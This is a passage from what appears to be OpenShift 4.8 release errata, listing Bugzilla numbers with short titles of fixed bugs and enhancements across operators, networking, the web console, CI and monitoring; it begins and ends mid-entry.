removeDuplicate pod strategy\n1950047 - CSV deployment template custom annotations are not propagated to deployments\n1950112 - SNO: machine-config pool is degraded:   error running chcon -R -t var_run_t /run/mco-machine-os-content/os-content-321709791\n1950113 - in-cluster operators need an API for additional AWS tags\n1950133 - MCO creates empty conditions on the kubeletconfig object\n1950159 - Downstream ovn-kubernetes repo should have no linter errors\n1950175 - Update Jenkins and agent base image to Go 1.16\n1950196 - ssh Key is added even with \u0027Expose SSH access to this virtual machine\u0027 unchecked\n1950210 - VPA CRDs use deprecated API version\n1950219 - KnativeServing is not shown in list on global config page\n1950232 - [Descheduler] - The minKubeVersion should be 1.21\n1950236 - Update OKD imagestreams to prefer centos7 images\n1950270 - should use \"kubernetes.io/os\" in the dns/ingresscontroller node selector description when executing oc explain command\n1950284 - Tracking bug for NE-563 - support user-defined tags on AWS load balancers\n1950341 - NetworkPolicy: allow-from-router policy does not allow access to service when the endpoint publishing strategy is HostNetwork on OpenshiftSDN network\n1950379 - oauth-server is in pending/crashbackoff at beginning 50% of CI runs\n1950384 - [sig-builds][Feature:Builds][sig-devex][Feature:Jenkins][Slow] openshift pipeline build  perm failing\n1950409 - Descheduler operator code and docs still reference v1beta1\n1950417 - The Marketplace Operator is building with EOL k8s versions\n1950430 - CVO serves metrics over HTTP, despite a lack of consumers\n1950460 - RFE: Change Request Size Input to Number Spinner Input\n1950471 - e2e-metal-ipi-ovn-dualstack is failing with etcd unable to bootstrap\n1950532 - Include \"update\" when referring to operator approval and channel\n1950543 - Document non-HA behaviors in the MCO (SingleNodeOpenshift)\n1950590 - CNO: Too many OVN netFlows collectors causes ovnkube pods CrashLoopBackOff\n1950653 - BuildConfig ignores Args\n1950761 - Monitoring operator deployments anti-affinity rules prevent their rollout on single-node\n1950908 - kube_pod_labels metric does not contain k8s labels\n1950912 - [e2e][automation] add devconsole tests\n1950916 - [RFE]console page show error when vm is poused\n1950934 - Unnecessary rollouts can happen due to unsorted endpoints\n1950935 - Updating cluster-network-operator builder \u0026 base images to be consistent with ART\n1950978 - the ingressclass cannot be removed even after deleting the related custom ingresscontroller\n1951007 - ovn master pod crashed\n1951029 - Drainer panics on missing context for node patch\n1951034 - (release-4.8) Split up the GatherClusterOperators into smaller parts\n1951042 - Panics every few minutes in kubelet logs post-rebase\n1951043 - Start Pipeline Modal Parameters should accept empty string defaults\n1951058 - [gcp-pd-csi-driver-operator] topology and multipods capabilities are not enabled in e2e tests\n1951066 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud\n1951084 - avoid benign \"Path \\\"/run/secrets/etc-pki-entitlement\\\" from \\\"/etc/containers/mounts.conf\\\" doesn\u0027t exist, skipping\" messages\n1951158 - Egress Router CRD missing Addresses entry\n1951169 - Improve API Explorer discoverability from the Console\n1951174 - re-pin libvirt to 6.0.0\n1951203 - oc adm catalog mirror can generate ICSPs that exceed etcd\u0027s size limit\n1951209 - RerunOnFailure runStrategy shows wrong VM status (Starting) on Succeeded VMI\n1951212 - User/Group details shows unrelated subjects in role bindings tab\n1951214 - VM list page crashes when the volume type is sysprep\n1951339 - Cluster-version operator does not manage operand container environments when manifest lacks opinions\n1951387 - opm index add doesn\u0027t respect deprecated bundles\n1951412 - Configmap gatherer can fail incorrectly\n1951456 - Docs and linting fixes\n1951486 - Replace \"kubevirt_vmi_network_traffic_bytes_total\" with new metrics names\n1951505 - Remove deprecated techPreviewUserWorkload field from CMO\u0027s configmap\n1951558 - Backport Upstream 101093 for Startup Probe Fix\n1951585 - enterprise-pod fails to build\n1951636 - assisted service operator use default serviceaccount in operator bundle\n1951637 - don\u0027t rollout a new kube-apiserver revision on oauth accessTokenInactivityTimeout changes\n1951639 - Bootstrap API server unclean shutdown causes reconcile delay\n1951646 - Unexpected memory climb while container not in use\n1951652 - Add retries to opm index add\n1951670 - Error gathering bootstrap log after pivot: The bootstrap machine did not execute the release-image.service systemd unit\n1951671 - Excessive writes to ironic Nodes\n1951705 - kube-apiserver needs alerts on CPU utlization\n1951713 - [OCP-OSP] After changing image in machine object it enters in Failed - Can\u0027t find created instance\n1951853 - dnses.operator.openshift.io resource\u0027s spec.nodePlacement.tolerations godoc incorrectly describes default behavior\n1951858 - unexpected text \u00270\u0027 on filter toolbar on RoleBinding tab\n1951860 - [4.8] add Intel XXV710 NIC model (1572) support in SR-IOV Operator\n1951870 - sriov network resources injector: user defined injection removed existing pod annotations\n1951891 - [migration] cannot change ClusterNetwork CIDR during migration\n1951952 - [AWS CSI Migration] Metrics for cloudprovider error requests are lost\n1952001 - Delegated authentication: reduce the number of watch requests\n1952032 - malformatted assets in CMO\n1952045 - Mirror nfs-server image used in jenkins-e2e\n1952049 - Helm: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1952079 - rebase openshift/sdn to kube 1.21\n1952111 - Optimize importing from @patternfly/react-tokens\n1952174 - DNS operator claims to be done upgrading before it even starts\n1952179 - OpenStack Provider Ports UI Underscore Variables\n1952187 - Pods stuck in ImagePullBackOff with errors like rpc error: code = Unknown desc = Error committing the finished image: image with ID \"SomeLongID\" already exists, but uses a different top layer: that ID\n1952211 - cascading mounts happening exponentially on when deleting openstack-cinder-csi-driver-node pods\n1952214 - Console Devfile Import Dev Preview broken\n1952238 - Catalog pods don\u0027t report termination logs to catalog-operator\n1952262 - Need support external gateway via hybrid overlay\n1952266 - etcd operator bumps status.version[name=operator] before operands update\n1952268 - etcd operator should not set Degraded=True EtcdMembersDegraded on healthy machine-config node reboots\n1952282 - CSR approver races with nodelink controller and does not requeue\n1952310 - VM cannot start up if the ssh key is added by another template\n1952325 - [e2e][automation] Check support modal in ssh tests and skip template parentSupport\n1952333 - openshift/kubernetes vulnerable to CVE-2021-3121\n1952358 - Openshift-apiserver CO unavailable in fresh OCP 4.7.5 installations\n1952367 - No VM status on overview page when VM is pending\n1952368 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc\n1952372 - VM stop action should not be there if the VM is not running\n1952405 - console-operator is not reporting correct Available status\n1952448 - Switch from Managed to Disabled mode: no IP removed from configuration and no container metal3-static-ip-manager stopped\n1952460 - In k8s 1.21 bump \u0027[sig-network] Firewall rule control plane should not expose well-known ports\u0027 test is disabled\n1952473 - Monitor pod placement during upgrades\n1952487 - Template filter does not work properly\n1952495 - \u201cCreate\u201d button on the Templates page is confuse\n1952527 - [Multus] multi-networkpolicy does wrong filtering\n1952545 - Selection issue when inserting YAML snippets\n1952585 - Operator links for \u0027repository\u0027 and \u0027container image\u0027 should be clickable in OperatorHub\n1952604 - Incorrect port in external loadbalancer config\n1952610 - [aws] image-registry panics when the cluster is installed in a new region\n1952611 - Tracking bug for OCPCLOUD-1115 - support user-defined tags on AWS EC2 Instances\n1952618 - 4.7.4-\u003e4.7.8 Upgrade Caused OpenShift-Apiserver Outage\n1952625 - Fix translator-reported text issues\n1952632 - 4.8 installer should default ClusterVersion channel to stable-4.8\n1952635 - Web console displays a blank page- white space instead of cluster information\n1952665 - [Multus] multi-networkpolicy pod continue restart due to OOM (out of memory)\n1952666 - Implement Enhancement 741 for Kubelet\n1952667 - Update Readme for cluster-baremetal-operator with details about the operator\n1952684 - cluster-etcd-operator: metrics controller panics on invalid response from client\n1952728 - It was not clear for users why Snapshot feature was not available\n1952730 - \u201cCustomize virtual machine\u201d and the \u201cAdvanced\u201d feature are confusing in wizard\n1952732 - Users did not understand the boot source labels\n1952741 - Monitoring DB: after set Time Range as Custom time range, no data display\n1952744 - PrometheusDuplicateTimestamps with user workload monitoring enabled\n1952759 - [RFE]It was not immediately clear what the Star icon meant\n1952795 - cloud-network-config-controller CRD does not specify correct plural name\n1952819 - failed to configure pod interface: error while waiting on flows for pod: timed out waiting for OVS flows\n1952820 - [LSO] Delete localvolume pv is failed\n1952832 - [IBM][ROKS] Enable the Web console UI to deploy OCS in External mode on IBM Cloud\n1952891 - Upgrade failed due to cinder csi driver not deployed\n1952904 - Linting issues in gather/clusterconfig package\n1952906 - Unit tests for configobserver.go\n1952931 - CI does not check leftover PVs\n1952958 - Runtime error loading console in Safari 13\n1953019 - [Installer][baremetal][metal3] The baremetal IPI installer fails on delete cluster with: failed to clean baremetal bootstrap storage pool\n1953035 - Installer should error out if publish: Internal is set while deploying OCP cluster on any on-prem platform\n1953041 - openshift-authentication-operator uses 3.9k% of its requested CPU\n1953077 - Handling GCP\u0027s: Error 400: Permission accesscontextmanager.accessLevels.list is not valid for this resource\n1953102 - kubelet CPU use during an e2e run increased 25% after rebase\n1953105 - RHCOS system components registered a 3.5x increase in CPU use over an e2e run before and after 4/9\n1953169 - endpoint slice controller doesn\u0027t handle services target port correctly\n1953257 - Multiple EgressIPs per node for one namespace when \"oc get hostsubnet\"\n1953280 - DaemonSet/node-resolver is not recreated by dns operator after deleting it\n1953291 - cluster-etcd-operator: peer cert DNS SAN is populated incorrectly\n1953418 - [e2e][automation] Fix vm wizard validate tests\n1953518 - thanos-ruler pods failed to start up for \"cannot unmarshal DNS message\"\n1953530 - Fix openshift/sdn unit test flake\n1953539 - kube-storage-version-migrator: priorityClassName not set\n1953543 - (release-4.8) Add missing sample archive data\n1953551 - build failure: unexpected trampoline for shared or dynamic linking\n1953555 - GlusterFS tests fail on ipv6 clusters\n1953647 - prometheus-adapter should have a PodDisruptionBudget in HA topology\n1953670 - ironic container image build failing because esp partition size is too small\n1953680 - ipBlock ignoring all other cidr\u0027s apart from the last one specified\n1953691 - Remove unused mock\n1953703 - Inconsistent usage of Tech preview badge in OCS plugin of OCP Console\n1953726 - Fix issues related to loading dynamic plugins\n1953729 - e2e unidling test is flaking heavily on SNO jobs\n1953795 - Ironic can\u0027t virtual media attach ISOs sourced from ingress routes\n1953798 - GCP e2e (parallel and upgrade) regularly trigger KubeAPIErrorBudgetBurn alert, also happens on AWS\n1953803 - [AWS] Installer should do pre-check to ensure user-provided private hosted zone name is valid for OCP cluster\n1953810 - Allow use of storage policy in VMC environments\n1953830 - The oc-compliance build does not available for OCP4.8\n1953846 - SystemMemoryExceedsReservation alert should consider hugepage reservation\n1953977 - [4.8] packageserver pods restart many times on the SNO cluster\n1953979 - Ironic caching virtualmedia images results in disk space limitations\n1954003 - Alerts shouldn\u0027t report any alerts in firing or pending state: openstack-cinder-csi-driver-controller-metrics TargetDown\n1954025 - Disk errors while scaling up a node with multipathing enabled\n1954087 - Unit tests for kube-scheduler-operator\n1954095 - Apply user defined tags in AWS Internal Registry\n1954105 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns\n1954124 - oc set volume not adding storageclass to pvc which leads to issues using snapshots\n1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js\n1954177 - machine-api: admissionReviewVersions v1beta1 is going to be removed in 1.22\n1954187 - multus: admissionReviewVersions v1beta1 is going to be removed in 1.22\n1954248 - Disable Alertmanager Protractor e2e tests\n1954317 - [assisted operator] Environment variables set in the subscription not being inherited by the assisted-service container\n1954330 - NetworkPolicy: allow-from-router with label policy-group.network.openshift.io/ingress: \"\" does not work on a upgraded cluster\n1954421 - Get \u0027Application is not available\u0027 when access Prometheus UI\n1954459 - Error: Gateway Time-out display on Alerting console\n1954460 - UI, The status of \"Used Capacity Breakdown [Pods]\"  is \"Not available\"\n1954509 - FC volume is marked as unmounted after failed reconstruction\n1954540 - Lack translation for local language on pages under storage menu\n1954544 - authn operator: endpoints controller should use the context it creates\n1954554 - Add e2e tests for auto node sizing\n1954566 - Cannot update a component (`UtilizationCard`) error when switching perspectives manually\n1954597 - Default image for GCP does not support ignition V3\n1954615 - Undiagnosed panic detected in pod: pods/openshift-cloud-credential-operator_cloud-credential-operator\n1954634 - apirequestcounts does not honor max users\n1954638 - apirequestcounts should indicate removedinrelease of empty instead of 2.0\n1954640 - Support of gatherers with different periods\n1954671 - disable volume expansion support in vsphere csi driver storage class\n1954687 - localvolumediscovery and localvolumset e2es are disabled\n1954688 - LSO has missing examples for localvolumesets\n1954696 - [API-1009] apirequestcounts should indicate useragent\n1954715 - Imagestream imports become very slow when doing many in parallel\n1954755 - Multus configuration should allow for net-attach-defs referenced in the openshift-multus namespace\n1954765 - CCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1954768 - baremetal-operator: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1954770 - Backport upstream fix for Kubelet getting stuck in DiskPressure\n1954773 - OVN: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert\n1954783 - [aws] support byo private hosted zone\n1954790 - KCM Alert PodDisruptionBudget At and Limit do not alert with maxUnavailable or MinAvailable by percentage\n1954830 - verify-client-go job is failing for release-4.7 branch\n1954865 - Add necessary priority class to pod-identity-webhook deployment\n1954866 - Add necessary priority class to downloads\n1954870 - Add necessary priority class to network components\n1954873 - dns server may not be specified for clusters with more than 2 dns servers specified by  openstack. \n1954891 - Add necessary priority class to pruner\n1954892 - Add necessary priority class to ingress-canary\n1954931 - (release-4.8) Remove legacy URL anonymization in the ClusterOperator related resources\n1954937 - [API-1009] `oc get apirequestcount` shows blank for column REQUESTSINCURRENTHOUR\n1954959 - unwanted decorator shown for revisions in topology though should only be shown only for knative services\n1954972 - TechPreviewNoUpgrade featureset can be undone\n1954973 - \"read /proc/pressure/cpu: operation not supported\" in node-exporter logs\n1954994 - should update to 2.26.0 for prometheus resources label\n1955051 - metrics \"kube_node_status_capacity_cpu_cores\" does not exist\n1955089 - Support [sig-cli] oc observe works as expected test for IPv6\n1955100 - Samples: APIRemovedInNextReleaseInUse info alerts display\n1955102 - Add vsphere_node_hw_version_total metric to the collected metrics\n1955114 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM\n1955196 - linuxptp-daemon crash on 4.8\n1955226 - operator updates apirequestcount CRD over and over\n1955229 - release-openshift-origin-installer-e2e-aws-calico-4.7 is permfailing\n1955256 - stop collecting API that no longer exists\n1955324 - Kubernetes Autoscaler should use Go 1.16 for testing scripts\n1955336 - Failure to Install OpenShift on GCP due to Cluster Name being similar to / contains \"google\"\n1955414 - 4.8 -\u003e 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator\n1955445 - Drop crio image metrics with high cardinality\n1955457 - Drop container_memory_failures_total metric because of high cardinality\n1955467 - Disable collection of node_mountstats_nfs metrics in node_exporter\n1955474 - [aws-ebs-csi-driver] rebase from version v1.0.0\n1955478 - Drop high-cardinality metrics from kube-state-metrics which aren\u0027t used\n1955517 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation\n1955548 - [IPI][OSP] OCP 4.6/4.7 IPI with kuryr exceeds defined serviceNetwork range\n1955554 - MAO does not react to events triggered from Validating Webhook Configurations\n1955589 - thanos-querier should have a PodDisruptionBudget in HA topology\n1955595 - Add DevPreviewLongLifecycle Descheduler profile\n1955596 - Pods stuck in creation phase on realtime kernel SNO\n1955610 - release-openshift-origin-installer-old-rhcos-e2e-aws-4.7 is permfailing\n1955622 - 4.8-e2e-metal-assisted jobs: Timeout of 360 seconds expired waiting for Cluster to be in status [\u0027installing\u0027, \u0027error\u0027]\n1955701 - [4.8] RHCOS boot image bump for RHEL 8.4 Beta\n1955749 - OCP branded templates need to be translated\n1955761 - packageserver clusteroperator does not set reason or message for Available condition\n1955783 - NetworkPolicy: ACL audit log message for allow-from-router policy should also include the namespace to distinguish between two policies similarly named configured in respective namespaces\n1955803 - OperatorHub - console accepts any value for \"Infrastructure features\" annotation\n1955822 - CIS Benchmark 5.4.1 Fails on ROKS 4: Prefer using secrets as files over secrets as environment variables\n1955854 - Ingress clusteroperator reports Degraded=True/Available=False if any ingresscontroller is degraded or unavailable\n1955862 - Local Storage Operator using LocalVolume CR fails to create PV\u0027s when backend storage failure is simulated\n1955874 - Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct\n1955879 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-\u003e Removed-\u003e Managed in configs.imageregistry with high ratio\n1955969 - Workers cannot be deployed attached to multiple networks. \n1956079 - Installer gather doesn\u0027t collect any networking information\n1956208 - Installer should validate root volume type\n1956220 - Set htt proxy system properties as expected by kubernetes-client\n1956281 - Disconnected installs are failing with kubelet trying to pause image from the internet\n1956334 - Event Listener Details page does not show Triggers section\n1956353 - test: analyze job consistently fails\n1956372 - openshift-gcp-routes causes disruption during upgrade by stopping before all pods terminate\n1956405 - Bump k8s dependencies in cluster resource override admission operator\n1956411 - Apply custom tags to AWS EBS volumes\n1956480 - [4.8] Bootimage bump tracker\n1956606 - probes FlowSchema manifest not included in any cluster profile\n1956607 - Multiple manifests lack cluster profile annotations\n1956609 - [cluster-machine-approver] CSRs for replacement control plane nodes not approved after restore from backup\n1956610 - manage-helm-repos manifest lacks cluster profile annotations\n1956611 - OLM CRD schema validation failing against CRs where the value of a string field is a blank string\n1956650 - The container disk URL is empty for Windows guest tools\n1956768 - aws-ebs-csi-driver-controller-metrics TargetDown\n1956826 - buildArgs does not work when the value is taken from a secret\n1956895 - Fix chatty kubelet log message\n1956898 - fix log files being overwritten on container state loss\n1956920 - can\u0027t open terminal for pods that have more than one container running\n1956959 - ipv6 disconnected sno crd deployment hive reports success status and clusterdeployrmet reporting false\n1956978 - Installer gather doesn\u0027t include pod names in filename\n1957039 - Physical VIP for pod -\u003e Svc -\u003e Host is incorrectly set to an IP of 169.254.169.2 for Local GW\n1957041 - Update CI e2echart with more node info\n1957127 - Delegated authentication: reduce the number of watch requests\n1957131 - Conformance tests for OpenStack require the Cinder client that is not included in the \"tests\" image\n1957146 - Only run test/extended/router/idle tests on OpenshiftSDN or OVNKubernetes\n1957149 - CI: \"Managed cluster should start all core operators\" fails with: OpenStackCinderDriverStaticResourcesControllerDegraded: \"volumesnapshotclass.yaml\" (string): missing dynamicClient\n1957179 - Incorrect VERSION in node_exporter\n1957190 - CI jobs failing due too many watch requests (prometheus-operator)\n1957198 - Misspelled console-operator condition\n1957227 - Issue replacing the EnvVariables using the unsupported ConfigMap\n1957260 - [4.8] [gcp] Installer is missing new region/zone europe-central2\n1957261 - update godoc for new build status image change trigger fields\n1957295 - Apply priority classes conventions as test to openshift/origin repo\n1957315 - kuryr-controller doesn\u0027t indicate being out of quota\n1957349 - [Azure] Machine object showing Failed phase even node is ready and VM is running properly\n1957374 - mcddrainerr doesn\u0027t list specific pod\n1957386 - Config serve and validate command should be under alpha\n1957446 - prepare CCO for future without v1beta1 CustomResourceDefinitions\n1957502 - Infrequent panic in kube-apiserver in aws-serial job\n1957561 - lack of pseudolocalization for some text on Cluster Setting page\n1957584 - Routes are not getting created  when using hostname  without FQDN standard\n1957597 - Public DNS records were not deleted when destroying a cluster which is using byo private hosted zone\n1957645 - Event \"Updated PrometheusRule.monitoring.coreos.com/v1 because it changed\" is frequently looped with weird empty {} changes\n1957708 - e2e-metal-ipi and related jobs fail to bootstrap due to multiple VIP\u0027s\n1957726 - Pod stuck in ContainerCreating - Failed to start transient scope unit: Connection timed out\n1957748 - Ptp operator pod should have CPU and memory requests set but not limits\n1957756 - Device Replacemet UI, The status of the disk is \"replacement ready\" before I clicked on \"start replacement\"\n1957772 - ptp daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent\n1957775 - CVO creating cloud-controller-manager too early causing upgrade failures\n1957809 - [OSP] Install with invalid platform.openstack.machinesSubnet results in runtime error\n1957822 - Update apiserver tlsSecurityProfile description to include Custom profile\n1957832 - CMO end-to-end tests work only on AWS\n1957856 - \u0027resource name may not be empty\u0027 is shown in CI testing\n1957869 - baremetal IPI power_interface for irmc is inconsistent\n1957879 - cloud-controller-manage ClusterOperator manifest does not declare relatedObjects\n1957889 - Incomprehensible documentation of the GatherClusterOperatorPodsAndEvents gatherer\n1957893 - ClusterDeployment / Agent conditions show \"ClusterAlreadyInstalling\" during each spoke install\n1957895 - Cypress helper projectDropdown.shouldContain is not an assertion\n1957908 - Many e2e failed requests caused by kube-storage-version-migrator-operator\u0027s version reads\n1957926 - \"Add Capacity\" should allow to add n*3 (or n*4) local devices at once\n1957951 - [aws] destroy can get blocked on instances stuck in shutting-down state\n1957967 - Possible test flake in listPage Cypress view\n1957972 - Leftover templates from mdns\n1957976 - Ironic execute_deploy_steps command to ramdisk times out, resulting in a failed deployment in 4.7\n1957982 - Deployment Actions clickable for view-only projects\n1957991 - ClusterOperatorDegraded can fire during installation\n1958015 - \"config-reloader-cpu\" and \"config-reloader-memory\" flags have been deprecated for prometheus-operator\n1958080 - Missing i18n for login, error and selectprovider pages\n1958094 - Audit log files are corrupted sometimes\n1958097 - don\u0027t show \"old, insecure token format\" if the token does not actually exist\n1958114 - Ignore staged vendor files in pre-commit script\n1958126 - [OVN]Egressip doesn\u0027t take effect\n1958158 - OAuth proxy container for AlertManager and Thanos are flooding the logs\n1958216 - ocp libvirt: dnsmasq options in install config should allow duplicate option names\n1958245 - cluster-etcd-operator: static pod revision is not visible from etcd logs\n1958285 - Deployment considered unhealthy despite being available and at latest generation\n1958296 - OLM must explicitly alert on deprecated APIs in use\n1958329 - pick 97428: add more context to log after a request times out\n1958367 - Build metrics do not aggregate totals by build strategy\n1958391 - Update MCO KubeletConfig to mixin the API Server TLS Security Profile Singleton\n1958405 - etcd: current health checks and reporting are not adequate to ensure availability\n1958406 - Twistlock flags mode of /var/run/crio/crio.sock\n1958420 - openshift-install 4.7.10 fails with segmentation error\n1958424 - aws: support more auth options in manual mode\n1958439 - Install/Upgrade button on Install/Upgrade Helm Chart page does not work with Form View\n1958492 - CCO: pod-identity-webhook still accesses APIRemovedInNextReleaseInUse\n1958643 - All pods creation stuck due to SR-IOV webhook timeout\n1958679 - Compression on pool can\u0027t be disabled via UI\n1958753 - VMI nic tab is not loadable\n1958759 - Pulling Insights report is missing retry logic\n1958811 - VM creation fails on API version mismatch\n1958812 - Cluster upgrade halts as machine-config-daemon fails to parse `rpm-ostree status` during cluster upgrades\n1958861 - [CCO] pod-identity-webhook certificate request failed\n1958868 - ssh copy is missing when vm is running\n1958884 - Confusing error message when volume AZ not found\n1958913 - \"Replacing an unhealthy etcd member whose node is not ready\" procedure results in new etcd pod in CrashLoopBackOff\n1958930 - network config in machine configs prevents addition of new nodes with static networking via kargs\n1958958 - [SCALE] segfault with ovnkube adding to address set\n1958972 - [SCALE] deadlock in ovn-kube when scaling up to 300 nodes\n1959041 - LSO Cluster UI,\"Troubleshoot\" link does not exist after scale down osd pod\n1959058 - ovn-kubernetes has lock contention on the LSP cache\n1959158 - packageserver clusteroperator Available condition set to false on any Deployment spec change\n1959177 - Descheduler dev manifests are missing permissions\n1959190 - Set LABEL io.openshift.release.operator=true for driver-toolkit image addition to payload\n1959194 - Ingress controller should use minReadySeconds because otherwise it is disrupted during deployment updates\n1959278 - Should remove prometheus servicemonitor from openshift-user-workload-monitoring\n1959294 - openshift-operator-lifecycle-manager:olm-operator-serviceaccount should not rely on external networking for health check\n1959327 - Degraded nodes on upgrade - Cleaning bootversions: Read-only file system\n1959406 - Difficult to debug performance on ovn-k without pprof enabled\n1959471 - Kube sysctl conformance tests are disabled, meaning we can\u0027t submit conformance results\n1959479 - machines doesn\u0027t support dual-stack loadbalancers on Azure\n1959513 - Cluster-kube-apiserver does not use library-go for audit pkg\n1959519 - Operand details page only renders one status donut no matter how many \u0027podStatuses\u0027 descriptors are used\n1959550 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console\n1959564 - Test verify /run filesystem contents failing\n1959648 - oc adm top --help indicates that oc adm top can display storage usage while it cannot\n1959650 - Gather SDI-related MachineConfigs\n1959658 - showing a lot \"constructing many client instances from the same exec auth config\"\n1959696 - Deprecate \u0027ConsoleConfigRoute\u0027 struct in console-operator config\n1959699 - [RFE] Collect LSO pod log and daemonset log managed by LSO\n1959703 - Bootstrap gather gets into an infinite loop on bootstrap-in-place mode\n1959711 - Egressnetworkpolicy  doesn\u0027t work when configure the EgressIP\n1959786 - [dualstack]EgressIP doesn\u0027t work on dualstack cluster for IPv6\n1959916 - Console not works well against a proxy in front of openshift clusters\n1959920 - UEFISecureBoot set not on the right master node\n1959981 - [OCPonRHV] - Affinity Group should not create by default if we define empty affinityGroupsNames: []\n1960035 - iptables is missing from ose-keepalived-ipfailover image\n1960059 - Remove \"Grafana UI\" link from Console Monitoring \u003e Dashboards page\n1960089 - ImageStreams list page, detail page and breadcrumb are not following CamelCase conventions\n1960129 - [e2e][automation] add smoke tests about VM pages and actions\n1960134 - some origin images are not public\n1960171 - Enable SNO checks for image-registry\n1960176 - CCO should recreate a user for the component when it was removed from the cloud providers\n1960205 - The kubelet log flooded with reconcileState message once CPU manager enabled\n1960255 - fixed obfuscation permissions\n1960257 - breaking changes in pr template\n1960284 - ExternalTrafficPolicy Local does not preserve connections correctly on shutdown, policy Cluster has significant performance cost\n1960323 - Address issues raised by coverity security scan\n1960324 - manifests: extra \"spec.version\" in console quickstarts makes CVO hotloop\n1960330 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960334 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960337 - manifests: invalid selector in ServiceMonitor makes CVO hotloop\n1960339 - manifests: unset \"preemptionPolicy\" makes CVO hotloop\n1960531 - Items under \u0027Current Bandwidth\u0027 for Dashboard \u0027Kubernetes / Networking / Pod\u0027 keep added for every access\n1960534 - Some graphs of console dashboards have no legend and tooltips are difficult to undstand compared with grafana\n1960546 - Add virt_platform metric to the collected metrics\n1960554 - Remove rbacv1beta1 handling code\n1960612 - Node disk info in overview/details does not account for second drive where /var is located\n1960619 - Image registry integration tests use old-style OAuth tokens\n1960683 - GlobalConfigPage is constantly requesting resources\n1960711 - Enabling IPsec runtime causing incorrect MTU on Pod interfaces\n1960716 - Missing details for debugging\n1960732 - Outdated manifests directory in CSI driver operator repositories\n1960757 - [OVN] hostnetwork pod can access MCS port 22623 or 22624 on master\n1960758 - oc debug / oc adm must-gather do not require openshift/tools and openshift/must-gather to be \"the newest\"\n1960767 - /metrics endpoint of the Grafana UI is accessible without authentication\n1960780 - CI: failed to create PDB \"service-test\" the server could not find the requested resource\n1961064 - Documentation link to network policies is outdated\n1961067 - Improve log gathering logic\n1961081 - policy/v1beta1 PodDisruptionBudget is deprecated in v1.21+, unavailable in v1.25+; use policy/v1 PodDisruptionBudget in CMO logs\n1961091 - Gather MachineHealthCheck definitions\n1961120 - CSI driver operators fail when upgrading a cluster\n1961173 - recreate existing static pod manifests instead of updating\n1961201 - [sig-network-edge] DNS should answer A and AAAA queries for a dual-stack service is constantly failing\n1961314 - Race condition in operator-registry pull retry unit tests\n1961320 - CatalogSource does not emit any metrics to indicate if it\u0027s ready or not\n1961336 - Devfile sample for BuildConfig is not defined\n1961356 - Update single quotes to double quotes in string\n1961363 - Minor string update for \" No Storage classes found in cluster, adding source is disabled.\"\n1961393 - DetailsPage does not work with group~version~kind\n1961452 - Remove \"Alertmanager UI\" link from Console Monitoring \u003e Alerting page\n1961466 - Some dropdown placeholder text on route creation page is not translated\n1961472 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true\n1961506 - NodePorts do not work on RHEL 7.9 workers (was \"4.7 -\u003e 4.8 upgrade is stuck at Ingress operator Degraded with rhel 7.9 workers\")\n1961536 - clusterdeployment without pull secret is crashing assisted service pod\n1961538 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop\n1961545 - Fixing Documentation Generation\n1961550 - HAproxy pod logs showing error \"another server named \u0027pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080\u0027 was already defined at line 326, please use distinct names\"\n1961554 - respect the shutdown-delay-duration from OpenShiftAPIServerConfig\n1961561 - The encryption controllers send lots of request to an API server\n1961582 - Build failure on s390x\n1961644 - NodeAuthenticator tests are failing in IPv6\n1961656 - driver-toolkit missing some release metadata\n1961675 - Kebab menu of taskrun contains Edit options which should not be present\n1961701 - Enhance gathering of events\n1961717 - Update runtime dependencies to Wallaby builds for bugfixes\n1961829 - Quick starts prereqs not shown when description is long\n1961852 - Excessive lock contention when adding many pods selected by the same NetworkPolicy\n1961878 - Add Sprint 199 translations\n1961897 - Remove history listener before console UI is unmounted\n1961925 - New ManagementCPUsOverride admission plugin blocks pod creation in clusters with no nodes\n1962062 - Monitoring dashboards should support default values of \"All\"\n1962074 - SNO:the pod get stuck in CreateContainerError and prompt \"failed to add conmon to systemd sandbox cgroup: dial unix /run/systemd/private: connect: resource temporarily unavailable\" after adding a performanceprofile\n1962095 - Replace gather-job image without FQDN\n1962153 - VolumeSnapshot routes are ambiguous, too generic\n1962172 - Single node CI e2e tests kubelet metrics endpoints intermittent downtime\n1962219 - NTO relies on unreliable leader-for-life implementation. \n1962256 - use RHEL8 as the vm-example\n1962261 - Monitoring components requesting more memory than they use\n1962274 - OCP on RHV installer fails to generate an install-config with only 2 hosts in RHV cluster\n1962347 - Cluster does not exist logs after successful installation\n1962392 - After upgrade from 4.5.16 to 4.6.17, customer\u0027s application is seeing re-transmits\n1962415 - duplicate zone information for in-tree PV after enabling migration\n1962429 - Cannot create windows vm because kubemacpool.io denied the request\n1962525 - [Migration] SDN migration stuck on MCO on RHV cluster\n1962569 - NetworkPolicy details page should also show Egress rules\n1962592 - Worker nodes restarting during OS installation\n1962602 - Cloud credential operator scrolls info \"unable to provide upcoming...\" on unsupported platform\n1962630 - NTO: Ship the current upstream TuneD\n1962687 - openshift-kube-storage-version-migrator pod failed due to Error: container has runAsNonRoot and image will run as root\n1962698 - 